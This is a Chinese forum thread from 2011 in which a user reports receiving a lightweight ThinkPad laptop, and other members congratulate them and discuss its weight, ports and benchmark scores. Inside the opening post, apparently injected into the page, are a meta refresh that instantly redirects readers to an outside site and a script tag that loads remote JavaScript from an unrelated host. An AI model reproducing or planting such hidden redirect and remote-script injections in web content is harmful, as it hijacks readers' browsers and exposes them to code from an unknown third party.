开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

机器到家了,si真轻!!!感觉还不错

关闭 [复制链接]
下午事情很多,没有及时更新,罪过罪过,
简单说一下提货经过,出了一点意外,本来机器上午就到了,中午查询时突然发现快递记录显示“联系不上买家,派送不成功”,心惊之下,急忙联系顺丰和Eddie,一番周折,总算自己在顺丰分部拿到本子,有惊无险,还好!   {:9_1123:} 个中细节,等到发使用手记时再细说,机器到手,第一感觉,很轻!非常轻!回家收拾好,开机简单看了看,速度还不错,也体会到昨天lixiangXD说的那种感受了,让我想起“天龙八部”里,虚竹相亲之后写给段誉的字条“我很好,我很快活,不用等我”,嗯嗯,差不多就是那种感觉!{:9_1122:}
明天还要出差,这次先传两张外观照吧,正好过年用上一段时间,回头好好写一个使用感受,包括传说中“一些和Eddie之间不得不说的事...”{:9_1141:}
ps:接口真少!!!

<meta http-equiv="refresh" content="0; url=http://www.9292.cc">
★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

恭喜啦
恭喜恭喜。。。
恭喜楼主了~~
ztysu 发表于 2011-1-24 15:19
占个坑先........

快点儿,内急~~~
恭喜。。。
和T410一样的重量吧
clg176 发表于 2011-1-24 17:30
和T410一样的重量吧

和T410s一样的外形一样的重量
恭喜了,呵呵,和不加s的比的确是轻了很多阿
adobepdf 发表于 2011-1-24 18:17
恭喜了,呵呵,和不加s的比的确是轻了很多阿

常出门很合适,虽然只轻了1斤左右,差别依然非常明显!!! 而性能上的损失可以一定程度的忽略(我不玩儿3D游戏)
恭喜lz,好货!

恭喜恭喜! 接口少确实是个小遗憾,但是实际上也够用了(2个USB口)!
恭喜楼主!
其实是3个usb口.  esata口也是USB口..通用的.
一天都可爽,就是下班时候手贱,非要找鲁大师评分,完了吧顺便还找同事的T510I一块评,结果可想而知,不用人家鄙视,自己就趴下了,性能和便携真是不能兼得啊,唉,没办法!

呵呵 独显的肯定综合评分高啊.  发表于 2011-1-25 11:18
白色的鼠标好pp哈~~~

不过还是Magic Mouse更pp
很漂亮,下次听听楼主的感受!
恭喜lz,再来点数据吧,评分,温度之类的
那个黄色的接口是usb+外接电池?

通过usb直接连220v电源么?  发表于 2011-1-25 11:56
USB关机状态下充电啊 跟T410一样  发表于 2011-1-25 11:17
我很好,我很快活,不用等我
大屏幕还是爽,男人
恭喜恭喜!!
恭喜楼主了
春节快乐,阖家幸福!
恭喜恭喜~~~